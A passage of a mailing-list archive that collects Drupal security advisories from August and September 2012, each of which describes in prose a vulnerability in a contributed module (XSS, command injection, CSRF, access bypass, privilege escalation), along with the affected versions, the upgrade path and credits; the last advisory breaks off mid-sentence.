View online: http://drupal.org/node/1789260 * Advisory ID: DRUPAL-SA-CONTRIB-2012-145 * Project: Imagemenu [1] (third-party module) * Version: 6.x * Date: 2012-September-19 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Imagemenu module allows you to create Drupal menus from images files. The module doesn't sufficiently escape image file names when rendering menus, allowing a potential XSS attack. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer imagemenu". CVE: Requested VERSIONS AFFECTED --- * Imagemenu 6.x-1.x versions prior to 6.x-1.4. Drupal core is not affected. If you do not use the contributed Imagemenu [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Imagemenu module for Drupal 6.x, upgrade to Imagemenu 6.x-1.4 [4] Also see the Imagemenu [5] project page. REPORTED BY - * David Houlder [6] FIXED BY * Paul Maddern [7], module maintainer * Marcus Clements [8], module maintainer * Ben Jeavons [9] of the Drupal Security Team COORDINATED BY -- * Michael Hess [10], Ben Jeavons [11], and Greg Knaddison [12] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16]. [1] http://drupal.org/project/imagemenu [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/imagemenu [4] http://drupal.org/node/1788726 [5] http://drupal.org/project/imagemenu [6] http://drupal.org/user/588210 [7] http://drupal.org/user/25159 [8] http://drupal.org/user/190002 [9] http://drupal.org/user/91990 [10] http://drupal.org/user/102818 [11] http://drupal.org/user/91990 [12] http://drupal.org/user/36762 [13] http://drupal.org/contact [14] http://drupal.org/security-team [15] http://drupal.org/writing-secure-code [16] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-144 Fonecta verify - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789258 * Advisory ID: DRUPAL-SA-CONTRIB-2012-144 * Project: Fonecta verify [1] (third-party module) * Version: 7.x * Date: 2012-September-19 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Fonecta verify provides an interface to retrieve information from the Finnish Fonecta company information database. The module contains an arbitrary script injection vulnerability (XSS) due to the fact that it fails to sanitize data retrieved from an untrusted third party source. This vulnerability is mitigated by the fact that an attacker must have either gained access to that third party source or use techniques such as DNS spoofing in order to inject malicious data. CVE: Requested VERSIONS AFFECTED --- * Fonecta verify 7.x-1.x versions prior to 7.x-1.6. Drupal core is not affected. If you do not use the contributed Fonecta verify [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Fonecta verify module for Drupal 7.x, upgrade to Fonecta verify 7.x-1.6 [4] Also see the Fonecta verify [5] project page. REPORTED BY - * Antti Alamäki [6] the module maintainer FIXED BY * Antti Alamäki [7] the module maintainer COORDINATED BY -- * Klaus Purer [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/fonecta_verify [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/fonecta_verify [4] http://drupal.org/node/1778782 [5] http://drupal.org/project/fonecta_verify [6] http://drupal.org/user/155131 [7] http://drupal.org/user/155131 [8] http://drupal.org/user/262198 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-143 PRH Search - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789252 * Advisory ID: DRUPAL-SA-CONTRIB-2012-143 * Project: PRH Search [1] (third-party module) * Version: 7.x * Date: 2012-September-19 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - PRH Search provides an interface to search for association information for Finnish association using the PRH (Patentti- ja Rekisterihallitus) database. The module fails to sanitize data retrieved from an untrusted third party source, thereby exposing an arbitrary script injection vulnerability (XSS). This vulnerability is mitigated by the fact that an attacker must have either gained access to that third party source or use techniques such as DNS spoofing in order to inject malicious data. CVE: Requested VERSIONS AFFECTED --- * PRH Search 7.x-1.x versions prior to 7.x-1.1 Drupal core is not affected. If you do not use the contributed PRH Search [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the PRH Search module for Drupal 7.x, upgrade to PRH Search 7.x-1.1 [4] Also see the PRH Search [5] project page. REPORTED BY - * Klaus Purer [6] of the Drupal Security Team FIXED BY * Antti Alamäki [7] the module maintainer COORDINATED BY -- * Klaus Purer [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/prh_search [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/prh_search [4] http://drupal.org/node/1778778 [5] http://drupal.org/project/prh_search [6] http://drupal.org/user/262198 [7] http://drupal.org/user/155131 [8] http://drupal.org/user/262198 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-142 - Spambot - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789242 * Advisory ID: DRUPAL-SA-CONTRIB-2012-142 * Project: Spambot [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-September-19 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Spambot module enables you to protect new user registrations from spammers using the database at stopforumspam.com. Spambot doesn't sufficiently sanitize API responses from stopforumspam.com when they are logged to the watchdog, allowing a potential XSS attack. This vulnerability is mitigated by the fact that only stopforumspam.com (or someone pretending to be stopforumspam.com) can exploit it. CVE: Requested VERSIONS AFFECTED --- * Spambot 6.x-3.x versions prior to 6.x-3.2. * Spambot 7.x-1.x versions prior to 7.x-1.1. Drupal core is not affected. If you do not use the contributed Spambot [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Spambot module for Drupal 6.x, upgrade to Spambot 6.x-3.2 [4] * If you use the Spambot module for Drupal 7.x, upgrade to Spambot 7.x-1.1 [5] Also see the Spambot [6] project page. REPORTED BY - * Jimmy Axenhus [7] FIXED BY * Beng Tan [8], the module maintainer * Jimmy Axenhus [9] COORDINATED BY -- * Greg Knaddison [10] of the Drupal Security Team * Ben Jeavons [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/spambot [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/spambot [4] http://drupal.org/node/1789084 [5] http://drupal.org/node/1789086 [6] http://drupal.org/project/spambot [7] http://drupal.org/user/565562 [8] http://drupal.org/user/132729 [9] http://drupal.org/user/565562 [10] http://drupal.org/user/36762 [11] http://drupal.org/user/91990 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-139 - PDFThumb OS Injection
View online: http://drupal.org/node/1782580 * Advisory ID: DRUPAL-SA-CONTRIB-2012-139 * Project: PDFThumb [1] (third-party module) * Version: 7.x * Date: 2012-September-12 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: OS Injection DESCRIPTION - PDFThumb module creates thumbnail images of PDF files. The module doesn't sufficiently escape user-entered values when executing commands on the server allowing an attacker to execute whatever commands are available to the web server user (e.g. www-data). This vulnerability is mitigated by the fact that an attacker must have a role with the permission "Administer PDFThumb". CVE: Requested VERSIONS AFFECTED --- * PDFThumb 7.x-1.x versions prior to 7.x-1.1 Drupal core is not affected. If you do not use the contributed PDFThumb [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the PDFThumb module for Drupal 7.x, upgrade to PDFThumb 7.x-1.1 [4] Also see the PDFThumb [5] project page. REPORTED BY - * Matt Kleve [6] of the Drupal Security Team * mdespeuilles [7], the module maintainer FIXED BY * Matt Kleve [8] of the Drupal Security Team * mdespeuilles [9], the module maintainer COORDINATED BY -- * Greg Knaddison [10] of the Drupal Security Team * Matt Kleve [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/pdfthumb [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/pdfthumb [4] http://drupal.org/node/1776248 [5] http://drupal.org/project/pdfthumb [6] http://drupal.org/user/150473 [7] http://drupal.org/user/939504 [8] http://drupal.org/user/150473 [9] http://drupal.org/user/939504 [10] http://drupal.org/user/36762 [11] http://drupal.org/user/150473 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-141 - Mass Contact - Access bypass
View online: http://drupal.org/node/1782832 * Advisory ID: DRUPAL-SA-CONTRIB-2012-141 * Project: Mass Contact [1] (third-party module) * Version: 6.x * Date: 2012-September-12 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module allows anyone with permission to send a single message to multiple users of a site, using its roles functionality. The module doesn't sufficiently check permissions after the form has been submitted. This vulnerability is mitigated by the fact that an attacker must use a tool of some kind (like the Tamper Data Firefox add-on) to intercept the form submission request in order to modify the settings. CVE: Requested VERSIONS AFFECTED --- * Mass Contact 6.x-1.x versions prior to 6.x-1.2. Drupal core is not affected. If you do not use the contributed Mass Contact [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Mass Contact module for Drupal 6.x, upgrade to Mass Contact 6.x-1.2 [4] Also see the Mass Contact [5] project page. REPORTED BY - * Michael Orlitzky [6] FIXED BY * Michael Orlitzky [7] * Jason Flatt [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/mass_contact [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/mass_contact [4] http://drupal.org/node/1782766 [5] http://drupal.org/project/mass_contact [6] http://drupal.org/user/1731656 [7] http://drupal.org/user/1731656 [8] http://drupal.org/user/4649 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-140 - Inf08 - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1782686 * Advisory ID: DRUPAL-SA-CONTRIB-2012-140 * Project: Inf08 [1] (third-party module) * Version: 6.x * Date: 2012-September-12 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Inf08 is a valid XHTML 1.0 Strict / CSS 2.1 theme ported from the free CSS template. The theme contains an arbitrary script injection vulnerability (XSS) due to the fact that it fails to sanitize user supplied taxonomy vocabulary names before display. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer taxonomy". CVE: Requested VERSIONS AFFECTED --- * Inf08 6.x-1.x versions prior to 6.x-1.10. Drupal core is not affected. If you do not use the contributed Inf08 [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Inf08 theme for Drupal 6.x, upgrade to Inf08 6.x-1.10 [4] Also see the Inf08 [5] project page. REPORTED BY - * Justin C. Klein Keane [6] FIXED BY * kong [7], the theme maintainer COORDINATED BY -- * Klaus Purer [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/inf08 [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/inf08 [4] http://drupal.org/node/1782286 [5] http://drupal.org/project/inf08 [6] http://drupal.org/user/15344 [7] http://drupal.org/user/46601 [8] http://drupal.org/user/262198 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-138 - Exposed Filter Data - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1775582 * Advisory ID: DRUPAL-SA-CONTRIB-2012-138 * Project: Exposed Filter Data [1] (third-party module) * Version: 6.x * Date: 2012-September-05 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Exposed Filter Data facilitates displaying data posted to Views via an exposed filter. The module does not properly sanitize user-supplied data prior to output, leading to a Cross-Site Scripting (XSS) vulnerability. CVE: Requested VERSIONS AFFECTED --- * Exposed Filter Data 6.x-1.x versions prior to 6.x-1.2. Drupal core is not affected. If you do not use the contributed Exposed Filter Data [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Exposed Filter Data module for Drupal 6.x, upgrade to Exposed Filter Data 6.x-1.2 [4]. * The 7.x-1.x branch is not vulnerable. If you use Exposed Filter Data for Drupal 7.x, there is nothing you need to do. Also see the Exposed Filter Data [5] project page. REPORTED BY - * Joe Tsui [6] * ekes [7] FIXED BY * Shushu Inbar [8], the module maintainer COORDINATED BY -- * Michael Hess (mlhess [9]) of the Drupal Security Team * Ivo Van Geertruyen (mr.baileys [10]) of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/exposed_filter_data [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/exposed_filter_data [4] http://drupal.org/node/1774636 [5] http://drupal.org/project/exposed_filter_data [6] https://drupal.org/user/125025 [7] http://drupal.org/user/10083 [8] https://drupal.org/user/99513 [9] http://drupal.org/user/102818 [10] http://drupal.org/user/383424 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-137 - Heartbeat - Cross Site Request Forgery (CSRF) in heartbeat_comments
View online: http://drupal.org/node/1775470 * Advisory ID: DRUPAL-SA-CONTRIB-2012-137 * Project: Heartbeat [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-September-5 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - This module enables you to display activity for events on a site. The module doesn't sufficiently check the heartbeat comment post values making it possible for an attacker to cause a user to unknowingly make comments. CVE: Requested VERSIONS AFFECTED --- * heartbeat_comments 6.x-4.x versions prior to 6.x-4.11. * heartbeat_comments 7.x-1.x versions prior to 7.x-1.0. Drupal core is not affected. If you do not use the contributed Heartbeat [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the heartbeat_comments or shouts module for Drupal 6.x, upgrade to heartbeat 6.x-4.12 [4] * If you use the heartbeat_comments module for Drupal 7.x, upgrade to heartbeat 7.x-1.1 [5] Also see the Heartbeat [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * Stalski [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Matt Chapman [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/heartbeat [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/heartbeat [4] http://drupal.org/node/1774140 [5] http://drupal.org/node/1774160 [6] http://drupal.org/project/heartbeat [7] http://drupal.org/user/36762 [8] http://drupal.org/user/322618 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/143172 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-136 - Apache Solr Search Autocomplete - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1762734 * Advisory ID: DRUPAL-SA-CONTRIB-2012-136 * Project: Apache Solr Autocomplete [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-August-29 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Apache Solr Search Autocomplete module enables you to add autocomplete capabilities to the search text field for the Apache Solr Search Integration module. The module doesn't sufficiently filter the autocomplete results sent back from the Drupal site, so under the scenario where someone provided a URL with a specially-crafted search string embedded in it, the attacker could have a user execute arbitrary Javascript when clicking or focusing on the autocomplete text field. This vulnerability is mitigated by the fact that the attacked user must click or otherwise give focus to the text widget to have the Javascript activate. CVE: Requested VERSIONS AFFECTED --- * Apache Solr Autocomplete 6.x-1.x versions prior to 6.x-1.4. * Apache Solr Autocomplete 7.x-1.x versions prior to 7.x-1.3. Drupal core is not affected. If you do not use the contributed Apache Solr Autocomplete [3] module, there is nothing you need to do. SOLUTION Install the latest version. * If you use the Apache Solr Autocomplete module for Drupal 6.x, upgrade to Apache Solr Autocomplete 6.x-1.4 [4] * If you use the Apache Solr Autocomplete module for Drupal 7.x, upgrade to Apache Solr Autocomplete 7.x-1.3 [5] Also see the Apache Solr Autocomplete [6] project page. REPORTED BY - * drupaledmonk [7] FIXED BY * Alejandro Garza [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/apachesolr_autocomplete [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/apachesolr_autocomplete [4] http://drupal.org/node/1762684 [5] http://drupal.org/node/1762686 [6] http://drupal.org/project/apachesolr_autocomplete [7] http://drupal.org/user/263391 [8] http://drupal.org/user/153120 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-135 - CAPTCHA - Insufficient anti-automation prevention
View online: http://drupal.org/node/1762496 * Advisory ID: DRUPAL-SA-CONTRIB-2012-135 * Project: CAPTCHA [1] (third-party module) * Version: 6.x * Date: 2011-August-29 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module enables you to protect website forms using a CAPTCHA. A CAPTCHA is a test which attempts to differentiate between a human and an automated bot or script. The module doesn't ensure that test submissions have a single-use unique token. This means that web robots could reuse a single successful submission multiple times, reducing the effectiveness of the protection. CVE: Requested VERSIONS AFFECTED --- * CAPTCHA 6.x-2.x versions prior to 6.x-2.3 Drupal core is not affected. If you do not use the contributed CAPTCHA [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the CAPTCHA module for Drupal 6.x, upgrade to CAPTCHA 6.x-2.3 [4] or greater Also see the CAPTCHA [5] project page. REPORTED BY - * LeeSai [6] * MustLive FIXED BY * Stefaan Lippens [7] a CAPTCHA module maintainer COORDINATED BY -- * Owen Barton [8] of the Drupal Security Team * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/captcha [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/captcha [4] http://drupal.org/node/967244 [5] http://drupal.org/project/captcha [6] http://drupal.org/user/680166 [7] http://drupal.org/user/41478 [8] http://drupal.org/user/19668 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-134 - Views - Privilege Escalation
View online: http://drupal.org/node/1762492 * Advisory ID: DRUPAL-SA-CONTRIB-2012-134 * Project: (third-party module) * Version: 6.x * Date: 2012-August-29 * Security risk: Critical [1] * Exploitable from: Remote * Vulnerability: Privilege escalation DESCRIPTION - The Views module provides a flexible method for Drupal site designers to control how lists and tables of content, users, taxonomy terms and other data are presented. The module incorrectly modifies the global user object in some situations when a view has a uid argument and performs validation on that argument. This vulnerability is mitigated by the fact that it only affects sites with more roles than default where a role with a low role ID has more privileges than other roles on the site and where untrusted (i.e. potentially malicious) users are granted several of those roles. CVE: Requested VERSIONS AFFECTED --- * Views 6.x-2.x versions prior to 6.x-2.16. Drupal core is not affected. If you do not use the contributed module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Views module for Drupal 6.x, upgrade to Views 6.x-2.16 [2] Also see the project page. REPORTED BY - * Derek Wright [3] of the Drupal Security Team * John Preto [4] FIXED BY * Derek Wright [5] one of module maintainers, also of the Drupal Security Team COORDINATED BY -- * Greg Knaddison [6] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7]. Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10]. [1] http://drupal.org/security-team/risk-levels [2] http://drupal.org/node/1341504 [3] http://drupal.org/user/46549 [4] http://drupal.org/user/356949 [5] http://drupal.org/user/46549 [6] http://drupal.org/user/36762 [7] http://drupal.org/contact [8] http://drupal.org/security-team [9] http://drupal.org/writing-secure-code [10] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-129 - Activism - Access Bypass
View online: http://drupal.org/node/1762160 * Advisory ID: DRUPAL-SA-CONTRIB-2012-129 * Project: Activism [1] (third-party module) * Version: 6.x * Date: 2012-08-29 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access Bypass DESCRIPTION - The Activism module is an attempt to standardize the way online advocacy tools are built in Drupal 6. It ships with and creates a "Campaign" content type which is always viewable, even when an administrator unpublishes it or otherwise restricts viewing access. CVE: Requested VERSIONS AFFECTED --- * Activism 6.x-2.0. Drupal core is not affected. If you do not use the contributed Activism [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Activism module for Drupal 6.x, upgrade to Activism 6.x-2.1 [4] Also see the Activism [5] project page. REPORTED BY - * Sheldon Rampton [6] FIXED BY * Sheldon Rampton [7], the issue reporter * Stella Power [8] of the Drupal Security Team COORDINATED BY -- * Stella Power [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/activism [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/activism [4] http://drupal.org/node/1762152 [5] http://drupal.org/project/activism [6] http://drupal.org/user/13085 [7] http://drupal.org/user/13085 [8] http://drupal.org/user/66894 [9] http://drupal.org/user/66894 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-130 - Jstool - Multiple Vulnerabilities
View online: http://drupal.org/node/1762220 * Advisory ID: DRUPAL-SA-CONTRIB-2012-130 * Project: Javascript Tool [1] (third-party module) * Version: 7.x * Date: 2012-August-29 * Security risk: Highly critical [2] * Exploitable from: Remote * Vulnerability: Multiple vulnerabilities DESCRIPTION - Javascript Tool enables administrators to edit any javascript file online from an admin panel. The module does not protect its menu paths, which contain sensitive information about all javascript files on the site and their contents. The module does not validate filenames which can lead to potential read/write access to arbitrary files on the server. Write access to files is mitigated by the fact that an attacker must have the permission to use the full_html text format. CVE: Requested VERSIONS AFFECTED --- * Javascript Tool 7.x-1.x versions prior to 7.x-1.7. Drupal core is not affected. If you do not use the contributed Javascript Tool [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Javascript Tool module for Drupal 7.x, upgrade to Javascript Tool 7.x-1.7 [4] Also see the Javascript Tool [5] project page. REPORTED BY - * Klaus Purer [6] of the Drupal Security Team FIXED BY * drupwash [7] the module maintainer COORDINATED BY -- * Klaus Purer [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/jstool [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/jstool [4] http://drupal.org/node/1759538 [5] http://drupal.org/project/jstool [6] http://drupal.org/user/262198 [7] http://drupal.org/user/1652472 [8] http://drupal.org/user/262198 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-133 - Taxonomy Image - Cross Site Scripting (XSS) & Arbitrary PHP code execution
View online: http://drupal.org/node/1762482 * Advisory ID: DRUPAL-SA-CONTRIB-2012-133 * Project: Taxonomy Image [1] (third-party module) * Version: 6.x * Date: 2012-August-29 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting, Arbitrary PHP code execution DESCRIPTION - The taxonomy_image module allows site administrators to associate images with taxonomy terms. The module did not sufficiently filter retrieval of taxonomy images, allowing users to bypass Drupal's normal file upload protections to install malicious HTML or executable code to the server. This vulnerability is mitigated by the fact that an attacker must have the permissions "administer taxonomy" and "administer taxonomy images", and that the fix for SA-2006-006 - Drupal Core - Execution of arbitrary files in certain Apache configurations [3] should prevent code execution in typical Apache configurations. CVE: Requested VERSIONS AFFECTED --- * Taxonomy Image 6.x-1.x versions prior to 6.x-1.7. Drupal core is not affected. If you do not use the contributed Taxonomy Image [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Taxonomy Image module for Drupal 6.x, upgrade to Taxonomy Image 